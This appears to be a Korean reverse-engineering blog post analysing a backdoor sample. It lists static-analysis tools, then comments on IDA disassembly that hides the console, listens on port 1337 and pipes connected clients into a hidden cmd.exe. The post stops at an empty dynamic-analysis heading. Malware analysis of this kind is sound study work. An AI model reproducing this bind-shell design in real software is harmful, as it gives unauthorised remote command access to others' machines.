Back Door

리버싱 2019. 11. 25. 17:42

( 기초 정적 분석 )

1. 패킹 유무 및 제작 프로그램을 확인   <- exeinfope

 

2. 실행 파일에 포함된 문자열 정보를 확인한다.  <-- bintext

  - 문자열

  - 사이트 주소

  - DLL , API 문자열

 

3. PE 구조를 확인한다

  - 제작 날짜 <-- (PE View) , IAT 정보 ( DLL , API ) <-- ( Depends )

 

4. 문자열 및 IAT 정보를 문서화해야한다.

 

5. 바이러스 토탈 사이트를 이용하여 자동화 분석을 실시한다.

 

6. 'PeStudio' 도구를 이용하여 

 

 

 


@ 고급 정적 분석

1. main 함수 분석

 1) main 함수

.text:00401000 ; int __cdecl main(int argc,const char **argv,const char *envp)
.text:00401000 _main           proc near               ; CODE XREF: ___tmainCRTStartup+10Ap
.text:00401000
.text:00401000 var_3D0         = dword ptr -3D0h
.text:00401000 Parameter       = dword ptr -3C4h
.text:00401000 timeout         = timeval ptr -3C0h
.text:00401000 var_3B8         = dword ptr -3B8h
.text:00401000 var_3B4         = dword ptr -3B4h
.text:00401000 readfds         = fd_set ptr -2B0h
.text:00401000 name            = sockaddr ptr -1A8h
.text:00401000 WSAData         = WSAData ptr -198h
.text:00401000 var_4           = dword ptr -4
.text:00401000 argc            = dword ptr  8
.text:00401000 argv            = dword ptr  0Ch
.text:00401000 envp            = dword ptr  10h
.text:00401000
.text:00401000                 push    ebp
.text:00401001                 mov     ebp, esp
.text:00401003                 and     esp, 0FFFFFFF8h
.text:00401006                 sub     esp, 3C4h
.text:0040100C                 mov     eax, dword_404000
.text:00401011                 xor     eax, esp
.text:00401013                 mov     [esp+3C4h+var_4], eax
.text:0040101A                 push    ebx
.text:0040101B                 push    esi
.text:0040101C                 push    edi
.text:0040101D                 call    ds:GetConsoleWindow
 - 윈도우 콘솔(윈도우창)을 얻어온다.
 
.text:00401023                 xor     esi, esi
.text:00401025                 push    esi             ; nCmdShow
.text:00401026                 push    eax             ; hWnd
.text:00401027                 call    ds:ShowWindow
 - 윈도우 상태를 안보이게 변경한다.

.text:0040102D                 push    esi             ; lpName
.text:0040102E                 push    esi             ; bInitialOwner
.text:0040102F                 push    esi             ; lpMutexAttributes
.text:00401030                 call    ds:CreateMutexA
 - 뮤텍스를 생성한다. (lpName 자리에 esi = 0, 즉 NULL이 전달되므로 이름 없는 뮤텍스이다.)
 - 다음 코드를 진행하다보면 뮤텍스 여부에 따른 분기 내용이 없기 때문에 의미 없는 동작이다. 이름이 없으므로 중복 실행 방지(단일 인스턴스 검사) 용도로도 쓰일 수 없다.


.text:00401036                 mov     hHandle, eax
.text:0040103B                 lea     eax, [esp+3D0h+WSAData]
.text:00401042                 push    eax             ; lpWSAData
.text:00401043                 push    101h            ; wVersionRequested
.text:00401048                 mov     [esp+3D8h+timeout.tv_sec], 5
.text:00401050                 mov     [esp+3D8h+timeout.tv_usec], esi
.text:00401054                 mov     [esp+3D8h+var_3B8], esi
.text:00401058                 mov     [esp+3D8h+readfds.fd_count], esi
.text:0040105F                 call    WSAStartup
 - 통신을 하기 위해서 소켓을 초기화한다.
 - 소켓 통신을 하기 이전에 사용된다. (성공 : 0)

.text:00401064                 push    esi             ; protocol
.text:00401065                 push    1               ; type
.text:00401067                 push    2               ; af
.text:00401069                 call    socket
 - 소켓을 생성한다. (성공 : 소켓 디스크립터, 실패 : -1) 리턴된 소켓 디스크립터는 바로 뒤에서 ebx에 저장되어 이후 bind/listen/accept의 s 인자로 사용된다.

.text:0040106E                 mov     ecx, 2
.text:00401073                 push    539h            ; hostshort
.text:00401078                 mov     ebx, eax
.text:0040107A                 mov     [esp+3D4h+name.sa_family], cx
.text:00401082                 call    htons
 - 호스트 바이트 순서를 네트워크 바이트 순서로 변환한다.

.text:00401087                 push    10h             ; namelen
.text:00401089                 lea     edx, [esp+3D4h+name]
.text:00401090                 push    edx             ; name
.text:00401091                 mov     dword ptr [esp+3D8h+name.sa_data+2], esi
.text:00401098                 push    ebx             ; s
.text:00401099                 mov     word ptr [esp+3DCh+name.sa_data], ax
.text:004010A1                 mov     esi, 539h
.text:004010A6                 call    bind
 - 1337(539h) 포트 번호를 esi에 대입하고 소켓을 특정 포트로 할당한다. (성공 : 0, 실패 : -1)

.text:004010AB                 mov     edi, ds:printf
.text:004010B1                 cmp     eax, 0FFFFFFFFh
.text:004010B4                 jnz     short loc_4010FA
 - EAX('bind' 함수 리턴값)와 '-1'를 비교한다.

0 - (-1) = 1  ZF = 0  JNZ 점프 O (bind 함수 처리 성공)
-1 - (-1) = 0  ZF = 1  JNZ 점프 X (bind 함수 처리 실패)


 2) loc_4010B6 (bind 함수 처리 실패)

.text:004010B6 loc_4010B6:                             ; CODE XREF: _main+F8j
.text:004010B6                 inc     esi
.text:004010B7                 push    esi             ; hostshort
.text:004010B8                 call    htons
 - 호스트 바이트 순서를 네트워크 바이트 순서로 변환한다.

.text:004010BD                 push    offset aBindError ; "bind error"
.text:004010C2                 mov     word ptr [esp+3D4h+name.sa_data], ax
.text:004010CA                 call    edi ; printf
 - "bind error" 문자열을 스택에 PUSH하고 printf 함수를 이용하여 출력한다.

.text:004010CC                 add     esp, 4
.text:004010CF                 push    3E8h            ; dwMilliseconds
.text:004010D4                 call    ds:Sleep
 - 1000msec(3E8h) 동안 Sleep을 실시한다.

.text:004010DA                 lea     eax, [esi-539h]
.text:004010E0                 cmp     eax, 0Fh
.text:004010E3                 jg      short loc_4010FA
 - lea 명령으로 esi - 539h (현재 포트 번호에서 1337을 뺀 값, 즉 포트를 증가시킨 횟수)를 EAX에 대입하고 EAX와 '0Fh'를 비교한다.
 - EAX > 0Fh 인 경우, loc_4010FA으로 점프한다.
 - EAX > 0Fh 가 아닌 경우, 다음 코드를 진행한다.

.text:004010E5                 push    10h             ; namelen
.text:004010E7                 lea     ecx, [esp+3D4h+name]
.text:004010EE                 push    ecx             ; name
.text:004010EF                 push    ebx             ; s
.text:004010F0                 call    bind
 - bind 함수 처리가 실시된다.  (성공 : 0, 실패 : -1)

.text:004010F5                 cmp     eax, 0FFFFFFFFh
.text:004010F8                 jz      short loc_4010B6
 - EAX('bind' 함수 리턴값)와 '-1'를 비교한다.

0 - (-1) = 1  ZF = 0  JZ 점프 X (bind 함수 처리 성공)
-1 - (-1) = 0  ZF = 1  JZ 점프 O (bind 함수 처리 실패)


 3) loc_4010FA (bind 함수 처리 성공)

.text:004010FA loc_4010FA:                             ; CODE XREF: _main+B4j
.text:004010FA                                         ; _main+E3j
.text:004010FA                 push    0Fh             ; backlog
.text:004010FC                 push    ebx             ; s
.text:004010FD                 call    listen          ; Call Procedure
 - 'bind' 함수 처리가 성공되면 'listen' 함수를 이용하여 대기 상태로 만든다. (성공 : 0, 실패 : -1)

.text:00401102                 cmp     eax, 0FFFFFFFFh ; Compare Two Operands
.text:00401105                 jnz     short loc_40112D ; Jump if Not Zero (ZF=0)
 - EAX('listen' 함수 리턴값)와 '-1'를 비교한다.

0 - (-1) = 1  ZF = 0  JNZ 점프 O (listen 함수 처리 성공)
-1 - (-1) = 0  ZF = 1  JNZ 점프 X (listen 함수 처리 실패)

.text:00401107                 call    WSACleanup      ; Call Procedure
.text:0040110C                 push    offset aErrorListening ; "Error listening socket."
.text:00401111                 call    edi ; printf    ; Indirect Call Near Procedure
 - "Error listening socket." 스택에 PUSH하고 printf 함수를 통해서 출력한다.

.text:00401113                 mov     ecx, [esp+3D4h+var_4]
.text:0040111A                 add     esp, 4          ; Add
.text:0040111D                 pop     edi
.text:0040111E                 pop     esi
.text:0040111F                 pop     ebx
.text:00401120                 xor     ecx, esp        ; Logical Exclusive OR
.text:00401122                 xor     eax, eax        ; Logical Exclusive OR
.text:00401124                 call    sub_401974      ; Call Procedure
.text:00401129                 mov     esp, ebp
.text:0040112B                 pop     ebp
.text:0040112C                 retn                    ; Return Near from Procedure


 4) loc_40112D(listen 함수 처리 성공)

.text:0040112D loc_40112D:                             ; CODE XREF: _main+105j
.text:0040112D                 mov     [esp+3D0h+var_3B4], ebx
.text:00401131                 mov     [esp+3D0h+var_3B8], 1
.text:00401139                 lea     esp, [esp+0]    ; Load Effective Address
.text:00401140
.text:00401140 loc_401140:                             ; CODE XREF: _main+1B5j
.text:00401140                                         ; _main+1C5j
.text:00401140                 mov     [esp+3D0h+Parameter], 0FFFFFFFFh
.text:00401148
.text:00401148 loc_401148:                             ; CODE XREF: _main+1B3j
.text:00401148                 lea     edx, [esp+3D0h+timeout] ; Load Effective Address
.text:0040114C                 push    edx             ; timeout
.text:0040114D                 push    0               ; exceptfds
.text:0040114F                 push    0               ; writefds
.text:00401151                 lea     eax, [esp+3DCh+readfds] ; Load Effective Address
.text:00401158                 push    eax             ; readfds
.text:00401159                 lea     eax, [ebx+1]    ; Load Effective Address
.text:0040115C                 mov     ecx, 41h
.text:00401161                 lea     esi, [esp+3E0h+var_3B8] ; Load Effective Address
.text:00401165                 lea     edi, [esp+3E0h+readfds] ; Load Effective Address
.text:0040116C                 push    eax             ; nfds
.text:0040116D                 rep movsd               ; Move Byte(s) from String to String
.text:0040116F                 call    select          ; Call Procedure
 - select 함수로 readfds에 담긴 소켓의 읽기 가능 여부를 검사한다. timeout.tv_sec = 5 이므로 최대 5초 대기한다. (리턴 : 준비된 소켓 수, 타임아웃 : 0, 실패 : -1)

.text:00401174                 cmp     eax, 0FFFFFFFFh ; Compare Two Operands
.text:00401177                 jz      short loc_4011B7 ; Jump if Zero (ZF=1)
 - EAX('select' 함수 리턴값)와 '-1'를 비교한다.

0 - (-1) = 1  ZF = 0  JZ 점프 X (select 함수 처리 성공)
-1 - (-1) = 0  ZF = 1  JZ 점프 O (select 함수 처리 실패)


.text:00401179                 test    eax, eax        ; Logical Compare
.text:0040117B                 jle     short loc_4011AE ; Jump if Less or Equal (ZF=1 | SF!=OF)
.text:0040117D                 push    0               ; addrlen
.text:0040117F                 push    0               ; addr
.text:00401181                 push    ebx             ; s
.text:00401182                 call    accept          ; Call Procedure
 - 클라이언트 접속 연결을 처리한다. (성공 :  0보다 크거나 같음, 실패 : -1)

.text:00401187                 push    0               ; lpThreadId
.text:00401189                 push    0               ; dwCreationFlags
.text:0040118B                 lea     ecx, [esp+3D8h+Parameter] ; Load Effective Address
.text:0040118F                 push    ecx             ; lpParameter
.text:00401190                 push    offset StartAddress ; lpStartAddress
.text:00401195                 push    0               ; dwStackSize
.text:00401197                 push    0               ; lpThreadAttributes
.text:00401199                 mov     [esp+3E8h+Parameter], eax
.text:0040119D                 call    ds:CreateThread ; Indirect Call Near Procedure
 - 쓰레드를 이용하여 연결된 클라이언트와의 통신을 처리한다.

.text:004011A3                 push    0C8h            ; dwMilliseconds
.text:004011A8                 call    ds:Sleep        ; Indirect Call Near Procedure
 - 200msec(0C8h) 동안 Sleep을 실시한다.

.text:004011AE
.text:004011AE loc_4011AE:                             ; CODE XREF: _main+17Bj
.text:004011AE                 cmp     [esp+3D0h+Parameter], 0FFFFFFFFh ; Compare Two Operands
.text:004011B3                 jz      short loc_401148 ; Jump if Zero (ZF=1)
.text:004011B5                 jmp     short loc_401140 ; Jump
 - Parameter가 -1(0FFFFFFFFh)이면 loc_401148로 점프하고, 그렇지 않으면 'loc_401140'로 점프하여 Parameter를 다시 -1로 초기화한 뒤 select 대기로 돌아간다.

.text:004011B7 ; ─────────────────────────────────────────────────────────────────────────
.text:004011B7
.text:004011B7 loc_4011B7:                             ; CODE XREF: _main+177j
.text:004011B7                 push    offset aSelect  ; "select"
.text:004011BC                 call    ds:perror       ; Indirect Call Near Procedure
.text:004011C2                 add     esp, 4          ; Add
.text:004011C5                 jmp     loc_401140      ; Jump
.text:004011C5 _main           endp


 5) main 함수에서 처리되는 내용

 - 윈도우창 생성 및 없애기, 뮤텍스 생성
 - 소켓 초기화/생성/바인딩/리스닝, 클라이언트 요청 수신
 - 쓰레드를 이용한 클라이언트 연결 처리


2. 'CreateThread' 함수 분석

 1) 'StartAddress' 내용 확인

.text:00401190                 push    offset StartAddress ; lpStartAddress
 - 'StartAddress'를 더블클릭하여 'CreateThread' 함수 인자값을 확인한다.

.text:00401195                 push    0               ; dwStackSize
.text:00401197                 push    0               ; lpThreadAttributes
.text:00401199                 mov     [esp+3E8h+Parameter], eax
.text:0040119D                 call    ds:CreateThread ; Indirect Call Near Procedure


 2) 'StartAddress' 분석
 
.text:004011D0 ; DWORD __stdcall StartAddress(LPVOID)
.text:004011D0 StartAddress    proc near               ; DATA XREF: _main+190o
.text:004011D0
.text:004011D0 BytesRead       = dword ptr -104A0h
.text:004011D0 hObject         = dword ptr -1049Ch
.text:004011D0 hNamedPipe      = dword ptr -10498h
.text:004011D0 s               = dword ptr -10494h
.text:004011D0 hReadPipe       = dword ptr -10490h
.text:004011D0 var_1048C       = dword ptr -1048Ch
.text:004011D0 hProcess        = dword ptr -10488h
.text:004011D0 ExitCode        = dword ptr -10478h
.text:004011D0 TotalBytesAvail = dword ptr -10474h
.text:004011D0 NumberOfBytesWritten= dword ptr -10470h
.text:004011D0 PipeAttributes  = _SECURITY_ATTRIBUTES ptr -1046Ch
.text:004011D0 StartupInfo     = _STARTUPINFOA ptr -10460h
.text:004011D0 var_10418       = byte ptr -10418h
.text:004011D0 var_10416       = byte ptr -10416h
.text:004011D0 var_10415       = byte ptr -10415h
.text:004011D0 var_10414       = byte ptr -10414h
.text:004011D0 var_10413       = byte ptr -10413h
.text:004011D0 var_10410       = byte ptr -10410h
.text:004011D0 var_1040E       = byte ptr -1040Eh
.text:004011D0 var_1040D       = byte ptr -1040Dh
.text:004011D0 var_1040C       = byte ptr -1040Ch
.text:004011D0 var_1040B       = byte ptr -1040Bh
.text:004011D0 buf             = byte ptr -10408h
.text:004011D0 Buffer          = byte ptr -10008h
.text:004011D0 var_4           = dword ptr -4
.text:004011D0 arg_0           = dword ptr  8
.text:004011D0
.text:004011D0                 push    ebp
.text:004011D1                 mov     ebp, esp
.text:004011D3                 and     esp, 0FFFFFFF8h ; Logical AND
.text:004011D6                 mov     eax, 104A4h
.text:004011DB                 call    __alloca_probe  ; Call Procedure
.text:004011E0                 mov     eax, dword_404000
.text:004011E5                 xor     eax, esp        ; Logical Exclusive OR
.text:004011E7                 mov     [esp+104A4h+var_4], eax
.text:004011EE                 mov     eax, hHandle
.text:004011F3                 push    ebx
.text:004011F4                 push    esi
.text:004011F5                 mov     esi, [ebp+arg_0]
.text:004011F8                 push    edi
.text:004011F9                 push    0FFFFFFFFh      ; dwMilliseconds
.text:004011FB                 push    eax             ; hHandle
.text:004011FC                 call    ds:WaitForSingleObject ; Indirect Call Near Procedure
 - EAX에 대입된 hHandle(뮤텍스)를 대기하고 소유권을 갖고 온다.

.text:00401202                 mov     edx, hHandle
.text:00401208                 mov     ecx, [esi]
.text:0040120A                 push    edx             ; hMutex
.text:0040120B                 mov     [esp+104B4h+s], ecx
.text:0040120F                 call    ds:ReleaseMutex ; Indirect Call Near Procedure
 - hHandle(뮤텍스) 소유권을 해제한다. 즉, 뮤텍스는 사용하지 않는다.

.text:00401215                 xor     ebx, ebx        ; Logical Exclusive OR
.text:00401217                 push    44h             ; size_t
.text:00401219                 lea     eax, [esp+104B4h+StartupInfo] ; Load Effective Address
.text:0040121D                 push    ebx             ; int
.text:0040121E                 push    eax             ; void *
.text:0040121F                 mov     [esp+104BCh+hObject], ebx
.text:00401223                 call    memset          ; Call Procedure
.text:00401228                 mov     edi, ds:CreatePipe
 - 'CreatePipe' 함수 주소를 EDI에 대입한다.

.text:0040122E                 add     esp, 0Ch        ; Add
.text:00401231                 xor     eax, eax        ; Logical Exclusive OR
.text:00401233                 push    ebx             ; nSize
.text:00401234                 lea     ecx, [esp+104B4h+PipeAttributes] ; Load Effective Address
.text:00401238                 push    ecx             ; lpPipeAttributes
.text:00401239                 lea     edx, [esp+104B8h+hObject] ; Load Effective Address
.text:0040123D                 mov     [esp+104B8h+hProcess], eax
.text:00401241                 mov     [esp+34h], eax
.text:00401245                 mov     [esp+38h], eax
.text:00401249                 mov     [esp+3Ch], eax
.text:0040124D                 push    edx             ; hWritePipe
.text:0040124E                 lea     eax, [esp+104BCh+hReadPipe] ; Load Effective Address
.text:00401252                 push    eax             ; hReadPipe
.text:00401253                 mov     [esp+104C0h+StartupInfo.cb], 44h
.text:0040125B                 mov     [esp+104C0h+PipeAttributes.nLength], 0Ch
.text:00401263                 mov     [esp+104C0h+PipeAttributes.lpSecurityDescriptor], ebx
.text:00401267                 mov     [esp+104C0h+PipeAttributes.bInheritHandle], 1
.text:0040126F                 call    edi ; CreatePipe ; Indirect Call Near Procedure
 - 파이프를 생성한다.

.text:00401271                 push    ebx             ; nSize
.text:00401272                 lea     ecx, [esp+104B4h+PipeAttributes] ; Load Effective Address
.text:00401276                 push    ecx             ; lpPipeAttributes
.text:00401277                 lea     edx, [esp+104B8h+var_1048C] ; Load Effective Address
.text:0040127B                 push    edx             ; hWritePipe
.text:0040127C                 lea     eax, [esp+104BCh+hNamedPipe] ; Load Effective Address
.text:00401280                 push    eax             ; hReadPipe
.text:00401281                 call    edi ; CreatePipe ; Indirect Call Near Procedure
 - 파이프를 생성한다.

.text:00401283                 lea     ecx, [esp+104B0h+StartupInfo] ; Load Effective Address
.text:00401287                 push    ecx             ; lpStartupInfo
.text:00401288                 call    ds:GetStartupInfoA ; Indirect Call Near Procedure
 - Startupinfo 구조체가 입력되어 실행된 프로세스 정보를 가져온다.
 - 2개의 파이프(입력/출력)를 이용하여 다음에 처리될 프로세스(cmd.exe)를 연결하기 위해서이다.

.text:0040128E                 mov     eax, [esp+104B0h+var_1048C]
.text:00401292                 mov     [esp+104B0h+StartupInfo.hStdOutput], eax
.text:00401299                 mov     [esp+104B0h+StartupInfo.hStdError], eax
.text:004012A0                 mov     eax, [esp+104B0h+hReadPipe]
.text:004012A4                 mov     [esp+104B0h+StartupInfo.hStdInput], eax
.text:004012AB                 mov     al, 0Ah
.text:004012AD                 xor     edx, edx        ; Logical Exclusive OR
.text:004012AF                 push    offset aCWindowsSystem ; "C:\\Windows\\System32\\cmd.exe"
 - "C:\\Windows\\System32\\cmd.exe" 문자열 주소를 _strdup 인자로 스택에 PUSH 한다. 이어서 스택에 바이트 단위로 기록되는 65h 78h 69h 74h 0Ah 00 과 45h 58h 49h 54h 0Ah 00 은 각각 "exit\n", "EXIT\n" 문자열이다. (al = 0Ah, bl = 0)

.text:004012B4                 mov     [esp+104B4h+StartupInfo.dwFlags], 101h
.text:004012BF                 mov     [esp+104B4h+StartupInfo.wShowWindow], dx
.text:004012C7                 mov     [esp+104B4h+var_10418], 65h
.text:004012CF                 mov     byte ptr [esp+9Dh], 78h
.text:004012D7                 mov     [esp+104B4h+var_10416], 69h
.text:004012DF                 mov     [esp+104B4h+var_10415], 74h
.text:004012E7                 mov     [esp+104B4h+var_10414], al
.text:004012EE                 mov     [esp+104B4h+var_10413], bl
.text:004012F5                 mov     [esp+104B4h+var_10410], 45h
.text:004012FD                 mov     byte ptr [esp+0A5h], 58h
.text:00401305                 mov     [esp+104B4h+var_1040E], 49h
.text:0040130D                 mov     [esp+104B4h+var_1040D], 54h
.text:00401315                 mov     [esp+104B4h+var_1040C], al
.text:0040131C                 mov     [esp+104B4h+var_1040B], bl
.text:00401323                 call    ds:_strdup      ; Indirect Call Near Procedure
.text:00401329                 mov     esi, ds:Sleep
.text:0040132F                 add     esp, 4          ; Add
.text:00401332                 push    14h             ; dwMilliseconds
.text:00401334                 mov     edi, eax
.text:00401336                 call    esi ; Sleep     ; Indirect Call Near Procedure
.text:00401338                 lea     ecx, [esp+104B0h+hProcess] ; Load Effective Address
.text:0040133C                 push    ecx             ; lpProcessInformation
.text:0040133D                 lea     edx, [esp+104B4h+StartupInfo] ; Load Effective Address
.text:00401341                 push    edx             ; lpStartupInfo
.text:00401342                 push    ebx             ; lpCurrentDirectory
.text:00401343                 push    ebx             ; lpEnvironment
.text:00401344                 push    10h             ; dwCreationFlags
.text:00401346                 push    1               ; bInheritHandles
.text:00401348                 push    ebx             ; lpThreadAttributes
.text:00401349                 push    ebx             ; lpProcessAttributes
.text:0040134A                 push    edi             ; lpCommandLine
.text:0040134B                 push    ebx             ; lpApplicationName
.text:0040134C                 call    ds:CreateProcessA ; Indirect Call Near Procedure
 - 새로운 프로세스(cmd.exe)와 쓰레드를 생성한다. (성공 : 0이 아닌 값, 실패 : 0)

.text:00401352                 test    eax, eax        ; Logical Compare
.text:00401354                 jnz     short loc_40136E ; Jump if Not Zero (ZF=0)

 - TEST 결과 값이 '0'인 경우,  ZF = 1 JNZ -> 점프 X (CreateProcessA 함수 실패)
 - TEST 결과 값이 '0'이 아닌 경우,  ZF = 0 JNZ -> 점프 O (CreateProcessA 함수 성공)


.text:00401356                 mov     eax, ds:?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A ; std::basic_ostream<char,std::char_traits> std::cout
.text:0040135B                 push    offset aCouldNotSpawnC ; "Could not spawn cmd.exe\n"
.text:00401360                 push    eax
.text:00401361                 call    sub_401650      ; Call Procedure
.text:00401366                 add     esp, 8          ; Add
.text:00401369                 jmp     loc_4015F3      ; Jump


 3) loc_40136E(CreateProcessA 함수 성공 : cmd.exe 실행)

.text:0040136E loc_40136E:                             ; CODE XREF: StartAddress+184j
.text:0040136E                 mov     edx, [esp+104B0h+hProcess]
.text:00401372                 lea     ecx, [esp+104B0h+ExitCode] ; Load Effective Address
.text:00401376                 push    ecx             ; lpExitCode
.text:00401377                 push    edx             ; hProcess
.text:00401378                 call    ds:GetExitCodeProcess ; Indirect Call Near Procedure
 - 프로세스 종료 코드를 조회한다. (호출 성공 : 0이 아닌 값, 실패 : 0)
 - 종료 코드 자체는 두 번째 인자(lpExitCode)로 넘긴 ExitCode 변수에 저장되며, 프로세스가 아직 실행 중이면 여기에 STILL_ACTIVE(103h)가 들어간다.

.text:0040137E                 cmp     eax, 103h       ; Compare Two Operands
.text:00401383                 jz      loc_40156B      ; Jump if Zero (ZF=1)
 - CMP 결과 값이 '0'인 경우,  ZF = 1 JZ -> 점프 O (GetExitCodeProcess 함수 성공)
  프로세스 실행 상태 X

 - CMP 결과 값이 '0'이 아닌 경우,  ZF = 0 JZ -> 점프 X (GetExitCodeProcess 함수 실패)
프로세스가 실행 상태 O

.text:00401389                 mov     edi, ds:PeekNamedPipe
.text:0040138F                 nop                     ; No Operation
.text:00401390
.text:00401390 loc_401390:                             ; CODE XREF: StartAddress+395j
.text:00401390                 push    1F4h            ; dwMilliseconds
.text:00401395                 mov     [esp+104B4h+BytesRead], ebx
.text:00401399                 call    esi ; Sleep     ; Indirect Call Near Procedure
.text:0040139B                 push    ebx             ; lpBytesLeftThisMessage
.text:0040139C                 lea     eax, [esp+104B4h+TotalBytesAvail] ; Load Effective Address
.text:004013A0                 push    eax             ; lpTotalBytesAvail
.text:004013A1                 mov     eax, [esp+104B8h+hNamedPipe]
.text:004013A5                 lea     ecx, [esp+104B8h+BytesRead] ; Load Effective Address
.text:004013A9                 push    ecx             ; lpBytesRead
.text:004013AA                 push    0FFFFh          ; nBufferSize
.text:004013AF                 lea     edx, [esp+104C0h+Buffer] ; Load Effective Address
.text:004013B6                 push    edx             ; lpBuffer
.text:004013B7                 push    eax             ; hNamedPipe
.text:004013B8                 call    edi ; PeekNamedPipe ; Indirect Call Near Procedure
.text:004013BA                 cmp     [esp+104B0h+BytesRead], ebx ; Compare Two Operands
.text:004013BE                 jz      loc_401459      ; Jump if Zero (ZF=1)

-------------------------------------------------------------------------------------
@ 고급 동적 분석

 

 
